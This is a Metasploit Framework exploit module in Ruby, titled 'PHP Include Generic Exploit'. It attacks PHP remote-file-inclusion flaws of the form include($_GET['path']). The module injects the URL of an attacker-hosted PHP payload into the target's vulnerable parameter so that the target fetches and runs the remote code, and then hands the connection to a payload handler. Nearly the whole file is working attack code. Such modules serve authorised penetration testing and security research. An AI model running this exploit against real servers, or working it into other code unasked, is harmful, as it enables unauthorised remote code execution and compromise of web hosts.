##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PHP Include Generic Exploit',
			'Description'    => %q{
				Exploits things like <?php include($_GET['path']); ?>
			},
			'Author'         => [ 'hdm' , 'egypt' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      => 
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]),
				], self.class)
	end
	

	def php_exploit
		# very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")
		# The option {'global' => true} is required to make findsock payloads work
		response = send_request_raw( { 
				'global' => true, 
				'uri' => uri,
			},timeout)

		handler
	end

end